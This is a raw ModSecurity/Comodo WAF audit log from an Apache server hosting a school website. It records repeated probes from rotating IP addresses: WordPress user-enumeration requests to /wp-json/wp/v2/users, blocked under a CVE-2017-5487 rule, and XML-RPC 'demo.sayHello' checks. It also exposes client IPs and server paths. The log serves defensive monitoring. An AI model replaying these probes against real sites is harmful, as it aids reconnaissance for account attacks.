userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507387339085 5981 (- - -) Stopwatch2: 1747507387339085 5981; combined=4511, p1=596, p2=3680, p3=40, p4=55, p5=83, sr=59, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6971ae22-Z-- --0c940462-A-- [18/May/2025:01:43:25 +0700] aCjYzRKi5m5upc8uMd4wBQAAAMg 103.236.140.4 35532 103.236.140.4 8181 --0c940462-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0c940462-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c940462-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507405789518 2836 (- - -) Stopwatch2: 1747507405789518 2836; combined=1238, p1=425, p2=782, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c940462-Z-- --6510f867-A-- [18/May/2025:01:43:33 +0700] aCjY1QTOsBn9MSWb6WLZ-gAAAI0 103.236.140.4 36074 103.236.140.4 8181 --6510f867-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.139 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6510f867-C-- demo.sayHello --6510f867-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6510f867-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507413104554 5243 (- - -) Stopwatch2: 1747507413104554 5243; combined=3819, p1=497, p2=3118, p3=29, p4=31, p5=86, sr=69, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6510f867-Z-- --2a806037-A-- [18/May/2025:01:44:06 +0700] aCjY9um4kjNN-hEbWjKgiAAAAEw 103.236.140.4 38620 103.236.140.4 8181 --2a806037-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2a806037-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a806037-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507446747839 2636 (- - -) Stopwatch2: 1747507446747839 2636; combined=1262, p1=404, p2=823, p3=0, p4=0, p5=35, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a806037-Z-- --5d107b30-A-- [18/May/2025:01:44:11 +0700] aCjY-xKi5m5upc8uMd4xMQAAANE 103.236.140.4 38946 103.236.140.4 8181 --5d107b30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.215 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5d107b30-C-- demo.sayHello --5d107b30-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d107b30-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507451270386 4225 (- - -) Stopwatch2: 1747507451270386 4225; combined=2997, p1=508, p2=2331, p3=25, p4=25, p5=64, sr=56, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d107b30-Z-- --575c8863-A-- [18/May/2025:01:46:15 +0700] aCjZdwTOsBn9MSWb6WLe-gAAAI4 103.236.140.4 47718 103.236.140.4 8181 --575c8863-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --575c8863-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --575c8863-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507575134456 3520 (- - -) Stopwatch2: 1747507575134456 3520; combined=2278, p1=684, p2=1554, p3=0, p4=0, p5=40, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --575c8863-Z-- --9a798319-A-- [18/May/2025:01:46:22 +0700] aCjZfhKi5m5upc8uMd40bQAAAMQ 103.236.140.4 48318 103.236.140.4 8181 --9a798319-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a798319-C-- demo.sayHello --9a798319-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a798319-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507582920449 4570 (- - -) Stopwatch2: 1747507582920449 4570; combined=3402, p1=474, p2=2737, p3=27, p4=29, p5=79, sr=108, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a798319-Z-- --13eb337f-A-- [18/May/2025:01:48:30 +0700] aCjZ_nyxdQCiyU1ENFeliAAAAAU 103.236.140.4 57850 103.236.140.4 8181 --13eb337f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13eb337f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13eb337f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507710298287 2854 (- - -) Stopwatch2: 1747507710298287 2854; combined=1464, p1=484, p2=946, p3=0, p4=0, p5=34, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13eb337f-Z-- --4a71b400-A-- [18/May/2025:01:48:31 +0700] aCjZ_xKi5m5upc8uMd437gAAANY 103.236.140.4 57970 103.236.140.4 8181 --4a71b400-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4a71b400-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a71b400-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507711699649 3533 (- - -) Stopwatch2: 1747507711699649 3533; combined=1991, p1=599, p2=1360, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a71b400-Z-- --9ec4a353-A-- [18/May/2025:01:48:37 +0700] aCjaBXyxdQCiyU1ENFelxgAAAAU 103.236.140.4 58424 103.236.140.4 8181 --9ec4a353-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9ec4a353-C-- demo.sayHello --9ec4a353-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ec4a353-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507717820915 5048 (- - -) Stopwatch2: 1747507717820915 5048; combined=3718, p1=486, p2=3028, p3=34, p4=35, p5=80, sr=61, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ec4a353-Z-- --934be03b-A-- [18/May/2025:01:48:38 +0700] aCjaBnyxdQCiyU1ENFelzAAAAAY 103.236.140.4 58478 103.236.140.4 8181 --934be03b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --934be03b-C-- demo.sayHello --934be03b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --934be03b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507718414342 4717 (- - -) Stopwatch2: 1747507718414342 4717; combined=3333, p1=456, p2=2697, p3=26, p4=24, p5=74, sr=124, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --934be03b-Z-- --e8744228-A-- [18/May/2025:01:51:30 +0700] aCjasgTOsBn9MSWb6WLmfQAAAI0 103.236.140.4 43674 103.236.140.4 8181 --e8744228-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e8744228-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8744228-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507890094930 3980 (- - -) Stopwatch2: 1747507890094930 3980; combined=2206, p1=656, p2=1514, p3=0, p4=0, p5=35, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8744228-Z-- --6a34381e-A-- [18/May/2025:01:51:38 +0700] aCjauhKi5m5upc8uMd485wAAAMI 103.236.140.4 44288 103.236.140.4 8181 --6a34381e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6a34381e-C-- demo.sayHello --6a34381e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a34381e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507898468351 5288 (- - -) Stopwatch2: 1747507898468351 5288; combined=3987, p1=658, p2=3100, p3=34, p4=34, p5=94, sr=74, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a34381e-Z-- --3ce3ec4a-A-- [18/May/2025:01:51:44 +0700] aCjawOm4kjNN-hEbWjKuzQAAAEw 103.236.140.4 44760 103.236.140.4 8181 --3ce3ec4a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ce3ec4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ce3ec4a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507904298175 2310 (- - -) Stopwatch2: 1747507904298175 2310; combined=922, p1=324, p2=572, p3=0, p4=0, p5=26, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ce3ec4a-Z-- --ed378265-A-- [18/May/2025:01:51:51 +0700] aCjax-m4kjNN-hEbWjKvBAAAAFE 103.236.140.4 45346 103.236.140.4 8181 --ed378265-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ed378265-C-- demo.sayHello --ed378265-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed378265-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507911403255 5535 (- - -) Stopwatch2: 1747507911403255 5535; combined=4096, p1=544, p2=3338, p3=34, p4=32, p5=87, sr=72, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed378265-Z-- --0f489138-A-- [18/May/2025:01:51:51 +0700] aCjaxwTOsBn9MSWb6WLnDgAAAIE 103.236.140.4 45380 103.236.140.4 8181 --0f489138-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0f489138-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f489138-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507911794807 3833 (- - -) Stopwatch2: 1747507911794807 3833; combined=2060, p1=686, p2=1328, p3=0, p4=0, p5=46, sr=160, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f489138-Z-- --247ca113-A-- [18/May/2025:01:51:58 +0700] aCjazgTOsBn9MSWb6WLnPgAAAIw 103.236.140.4 45930 103.236.140.4 8181 --247ca113-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --247ca113-C-- demo.sayHello --247ca113-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --247ca113-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507918549301 4330 (- - -) Stopwatch2: 1747507918549301 4330; combined=2966, p1=446, p2=2342, p3=26, p4=25, p5=73, sr=84, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --247ca113-Z-- --8f659775-A-- [18/May/2025:01:56:54 +0700] aCjb9nyxdQCiyU1ENFeyaAAAAAI 103.236.140.4 39714 103.236.140.4 8181 --8f659775-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8f659775-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f659775-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at 